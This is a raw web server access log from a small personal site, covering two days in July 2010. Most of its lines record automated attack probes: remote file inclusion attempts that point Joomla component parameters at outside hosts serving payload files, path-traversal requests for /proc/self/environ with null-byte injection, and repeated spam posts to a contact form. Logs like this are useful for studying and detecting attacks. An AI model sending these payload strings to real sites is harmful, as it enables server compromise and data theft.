207.46.204.244 - - [04/Jul/2010:22:56:03 -0500] "GET /logs/access_log.1236902400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.105.40.177 - - [04/Jul/2010:23:02:56 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""WebRingChecker/1.71 LWP/5.79"
67.213.231.211 - - [04/Jul/2010:23:04:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:39 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:39 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:39 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:39 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:39 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:39 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:40 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:40 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:40 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:40 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:40 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:40 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:40 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:40 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [04/Jul/2010:23:04:40 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.195.112.180 - - [04/Jul/2010:23:07:33 -0500] "GET /logs/access_log.1168819200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.176.226.186 - - [04/Jul/2010:23:08:10 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
81.176.226.186 - - [04/Jul/2010:23:08:10 -0500] "GET /logs/access_log.1277164800/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""MaMa CaSpEr"
81.176.226.186 - - [04/Jul/2010:23:08:10 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
194.109.22.66 - - [04/Jul/2010:23:10:16 -0500] "GET /index2.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
194.109.22.66 - - [04/Jul/2010:23:10:22 -0500] "GET /index.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
89.189.179.214 - - [04/Jul/2010:23:13:59 -0500] "GET /index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""MaMa CaSpEr"
89.189.179.214 - - [04/Jul/2010:23:13:59 -0500] "GET /logs/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""MaMa CaSpEr"
89.189.179.214 - - [04/Jul/2010:23:14:00 -0500] "GET /logs/access_log.1277164800%20%20/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""MaMa CaSpEr"
194.109.22.66 - - [04/Jul/2010:23:15:16 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
194.109.22.66 - - [04/Jul/2010:23:15:22 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [04/Jul/2010:23:16:28 -0500] "GET /logs/access_log.1276646400/index2.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.816"
194.109.22.66 - - [04/Jul/2010:23:16:29 -0500] "GET /index2.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
194.109.22.66 - - [04/Jul/2010:23:16:29 -0500] "GET /logs/index2.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.816"
89.189.179.214 - - [04/Jul/2010:23:16:35 -0500] "GET /logs/access_log.1276819200%20%20/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""MaMa CaSpEr"
194.109.22.66 - - [04/Jul/2010:23:17:39 -0500] "GET /logs/access_log.1276646400/index.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [04/Jul/2010:23:17:39 -0500] "GET /index.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [04/Jul/2010:23:17:40 -0500] "GET /logs/index.php?option=com_mmsblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
207.46.199.200 - - [04/Jul/2010:23:34:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.46.59.3 - - [04/Jul/2010:23:34:42 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:42 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:44 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:44 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:44 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:44 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:44 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:44 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:34:45 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
194.109.22.66 - - [04/Jul/2010:23:36:50 -0500] "GET /logs/access_log.1277164800/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.816"
194.109.22.66 - - [04/Jul/2010:23:36:50 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
194.109.22.66 - - [04/Jul/2010:23:36:51 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.816"
194.109.22.66 - - [04/Jul/2010:23:39:37 -0500] "GET /logs/access_log.1277164800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [04/Jul/2010:23:39:37 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [04/Jul/2010:23:39:37 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
113.30.66.24 - - [04/Jul/2010:23:42:05 -0500] "GET /logs/access_log.1266710400%20%20////?_PHPLIB[libdir]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
113.30.66.24 - - [04/Jul/2010:23:42:05 -0500] "GET ////?_PHPLIB[libdir]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
113.30.66.24 - - [04/Jul/2010:23:42:05 -0500] "GET /logs////?_PHPLIB[libdir]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 12142 "-""Mozilla/5.0"
89.189.179.214 - - [04/Jul/2010:23:42:17 -0500] "GET /index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""MaMa CaSpEr"
89.189.179.214 - - [04/Jul/2010:23:42:17 -0500] "GET /logs/access_log.1277164800%20%20/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""MaMa CaSpEr"
89.189.179.214 - - [04/Jul/2010:23:42:17 -0500] "GET /logs/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""MaMa CaSpEr"
67.19.116.186 - - [04/Jul/2010:23:43:20 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
89.189.179.214 - - [04/Jul/2010:23:45:01 -0500] "GET /logs/access_log.1276041600%20%20/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""MaMa CaSpEr"
113.30.66.24 - - [04/Jul/2010:23:49:52 -0500] "GET ////?_PHPLIB[libdir]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
113.30.66.24 - - [04/Jul/2010:23:49:59 -0500] "GET /logs/access_log.1266710400%20%20////?_PHPLIB[libdir]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
113.30.66.24 - - [04/Jul/2010:23:49:59 -0500] "GET /logs////?_PHPLIB[libdir]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 12142 "-""Mozilla/5.0"
207.46.204.240 - - [04/Jul/2010:23:51:04 -0500] "GET /logs/access_log.1194739200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [04/Jul/2010:23:57:49 -0500] "GET /tattoo/set2.htm HTTP/1.0" 200 1953 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
78.46.59.3 - - [04/Jul/2010:23:59:28 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:28 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:28 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:28 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:28 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:28 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:29 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:29 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:29 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:29 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:29 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:30 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:30 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:30 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:30 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:30 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:30 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:30 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:30 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:30 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
78.46.59.3 - - [04/Jul/2010:23:59:31 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
89.189.179.214 - - [05/Jul/2010:00:04:32 -0500] "GET /index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""MaMa CaSpEr"
89.189.179.214 - - [05/Jul/2010:00:04:32 -0500] "GET /logs/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""MaMa CaSpEr"
89.189.179.214 - - [05/Jul/2010:00:04:48 -0500] "GET /logs/access_log.1277164800%20%20/index2.php?option=com_myblog&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""MaMa CaSpEr"
67.195.112.180 - - [05/Jul/2010:00:05:05 -0500] "GET /logs/access_log.1213660800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.179.49.231 - - [05/Jul/2010:00:06:53 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
66.179.49.231 - - [05/Jul/2010:00:06:54 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
89.111.176.206 - - [05/Jul/2010:00:08:38 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.111.176.206 - - [05/Jul/2010:00:08:38 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.111.176.206 - - [05/Jul/2010:00:08:38 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.111.176.206 - - [05/Jul/2010:00:08:38 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.179.49.231 - - [05/Jul/2010:00:09:01 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
66.179.49.231 - - [05/Jul/2010:00:09:09 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
89.111.176.206 - - [05/Jul/2010:00:09:31 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
116.50.209.67 - - [05/Jul/2010:00:09:52 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://www.google.com.ph/search?hl=tl&client=firefox-a&hs=LrF&rls=org.mozilla:en-US:official&q=costumes+all+nations&revid=1653364981&sa=X&ei=-CsxTLuqLYi-ceqHnLID&ved=0CFgQ1QIoAA""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
66.179.49.231 - - [05/Jul/2010:00:09:55 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
66.179.49.231 - - [05/Jul/2010:00:09:55 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
66.179.49.231 - - [05/Jul/2010:00:10:34 -0500] "GET /logs/access_log.1275782400/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.825"
66.179.49.231 - - [05/Jul/2010:00:10:34 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
66.179.49.231 - - [05/Jul/2010:00:10:34 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.825"
66.179.49.231 - - [05/Jul/2010:00:10:59 -0500] "GET /logs/access_log.1275782400/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.825"
66.179.49.231 - - [05/Jul/2010:00:10:59 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
66.179.49.231 - - [05/Jul/2010:00:10:59 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.825"
67.19.116.186 - - [05/Jul/2010:00:11:12 -0500] "GET /logs/access_log.1276300800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 372 "-""libwww-perl/5.810"
67.19.116.186 - - [05/Jul/2010:00:11:12 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
67.19.116.186 - - [05/Jul/2010:00:11:12 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
89.111.176.206 - - [05/Jul/2010:00:13:58 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.111.176.206 - - [05/Jul/2010:00:13:58 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.111.176.206 - - [05/Jul/2010:00:13:58 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
66.98.224.33 - - [05/Jul/2010:00:14:00 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
66.98.224.33 - - [05/Jul/2010:00:14:00 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
66.179.49.231 - - [05/Jul/2010:00:14:13 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.825"
66.179.49.231 - - [05/Jul/2010:00:14:13 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
66.179.49.231 - - [05/Jul/2010:00:14:13 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.825"
66.98.224.33 - - [05/Jul/2010:00:14:23 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
66.98.224.33 - - [05/Jul/2010:00:14:24 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
66.179.49.231 - - [05/Jul/2010:00:14:29 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.825"
66.179.49.231 - - [05/Jul/2010:00:14:30 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
66.179.49.231 - - [05/Jul/2010:00:14:30 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.825"
89.111.176.206 - - [05/Jul/2010:00:14:31 -0500] "GET /logs/access_log.1276214400/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.111.176.206 - - [05/Jul/2010:00:14:31 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.111.176.206 - - [05/Jul/2010:00:14:32 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.111.176.206 - - [05/Jul/2010:00:14:32 -0500] "GET /logs/access_log.1276214400/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.111.176.206 - - [05/Jul/2010:00:14:32 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
